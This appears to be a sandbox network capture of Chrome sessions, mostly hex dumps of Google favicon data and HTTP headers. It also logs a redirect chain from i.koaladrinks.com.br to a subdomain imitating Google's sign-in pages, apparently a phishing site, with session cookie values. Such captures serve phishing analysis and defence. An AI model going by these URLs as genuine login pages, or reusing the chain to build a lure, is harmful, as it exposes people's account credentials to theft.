                                                      2025-01-10 08:27:20 UTC231INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/favicon.ico">here</A>.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.949735142.250.185.684432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:21 UTC682OUTGET /favicon.ico HTTP/1.1
                                                      Host: www.google.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIlKHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://i.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:21 UTC705INHTTP/1.1 200 OK
                                                      Accept-Ranges: bytes
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                      Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                      Content-Length: 5430
                                                      X-Content-Type-Options: nosniff
                                                      Server: sffe
                                                      X-XSS-Protection: 0
                                                      Date: Fri, 10 Jan 2025 08:05:14 GMT
                                                      Expires: Sat, 18 Jan 2025 08:05:14 GMT
                                                      Cache-Control: public, max-age=691200
                                                      Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                      Content-Type: image/x-icon
                                                      Vary: Accept-Encoding
                                                      Age: 1327
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close
                                                      2025-01-10 08:27:21 UTC685INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                      Data Ascii: h& ( 0.v]X:X:rY
                                                      2025-01-10 08:27:21 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a
                                                      Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
                                                      2025-01-10 08:27:21 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff
                                                      Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
                                                      2025-01-10 08:27:21 UTC1390INData Raw: ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                      Data Ascii: BBBBBBF!4I
                                                      2025-01-10 08:27:21 UTC575INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                      Data Ascii: $'


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.949736216.58.206.364432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:22 UTC442OUTGET /favicon.ico HTTP/1.1
                                                      Host: www.google.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIlKHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:22 UTC705INHTTP/1.1 200 OK
                                                      Accept-Ranges: bytes
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                      Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                      Content-Length: 5430
                                                      X-Content-Type-Options: nosniff
                                                      Server: sffe
                                                      X-XSS-Protection: 0
                                                      Date: Fri, 10 Jan 2025 08:05:14 GMT
                                                      Expires: Sat, 18 Jan 2025 08:05:14 GMT
                                                      Cache-Control: public, max-age=691200
                                                      Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                      Content-Type: image/x-icon
                                                      Vary: Accept-Encoding
                                                      Age: 1328
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close
                                                      2025-01-10 08:27:22 UTC685INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                      Data Ascii: h& ( 0.v]X:X:rY
                                                      2025-01-10 08:27:22 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a
                                                      Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
                                                      2025-01-10 08:27:22 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff
                                                      Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
                                                      2025-01-10 08:27:22 UTC1390INData Raw: ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                      Data Ascii: BBBBBBF!4I
                                                      2025-01-10 08:27:22 UTC575INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                      Data Ascii: $'


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.949729139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:30 UTC820OUTGET /XZoMKBqJ?e=IxiR3J4 HTTP/1.1
                                                      Host: i.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      Referer: https://i.koaladrinks.com.br/XZoMKBqJ
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:30 UTC20INHTTP/1.1 302 Found
                                                      2025-01-10 08:27:30 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:30 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:30 UTC25INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a
                                                      Data Ascii: Content-Type: text/html
                                                      2025-01-10 08:27:30 UTC120INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 2f 73 69 67 6e 69 6e 2f 76 32 2f 69 64 65 6e 74 69 66 69 65 72 3f 68 6c 3d 65 6e 26 66 6c 6f 77 4e 61 6d 65 3d 47 6c 69 66 57 65 62 53 69 67 6e 49 6e 26 66 6c 6f 77 45 6e 74 72 79 3d 53 65 72 76 69 63 65 4c 6f 67 69 6e 0d 0a
                                                      Data Ascii: Location: https://ijgbload.koaladrinks.com.br/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin
                                                      2025-01-10 08:27:30 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:27:30 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:27:30 UTC3INData Raw: 30 0d 0a
                                                      Data Ascii: 0
                                                      2025-01-10 08:27:30 UTC2INData Raw: 0d 0a
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.949738139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:32 UTC871OUTGET /signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Referer: https://i.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:32 UTC32INHTTP/1.1 302 Moved Temporarily
                                                      2025-01-10 08:27:32 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:32 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:32 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:32 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=UTF-8
                                                      2025-01-10 08:27:32 UTC82INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 63 6f 6f 70 5f 67 73 65 5f 71 65 62 68 6c 6b 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                      2025-01-10 08:27:32 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 33 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:32 GMT
                                                      2025-01-10 08:27:32 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:27:32 UTC112INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 2f 53 65 72 76 69 63 65 4c 6f 67 69 6e 3f 66 6c 6f 77 45 6e 74 72 79 3d 53 65 72 76 69 63 65 4c 6f 67 69 6e 26 66 6c 6f 77 4e 61 6d 65 3d 47 6c 69 66 57 65 62 53 69 67 6e 49 6e 26 68 6c 3d 65 6e 0d 0a
                                                      Data Ascii: Location: https://ijgbload.koaladrinks.com.br/ServiceLogin?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en
                                                      2025-01-10 08:27:32 UTC18INData Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a
                                                      Data Ascii: Pragma: no-cache
                                                      2025-01-10 08:27:32 UTC134INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 67 72 6f 75 70 22 3a 22 63 6f 6f 70 5f 67 73 65 5f 71 65 62 68 6c 6b 22 2c 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 73 70 2e 77 69 74 68 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 73 70 2f 72 65 70 6f 72 74 2d 74 6f 2f 67 73 65 5f 71 65 62 68 6c 6b 22 7d 5d 7d 0d 0a
                                                      Data Ascii: Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.949739139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:33 UTC926OUTGET /ServiceLogin?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Referer: https://i.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:34 UTC20INHTTP/1.1 302 Found
                                                      2025-01-10 08:27:34 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
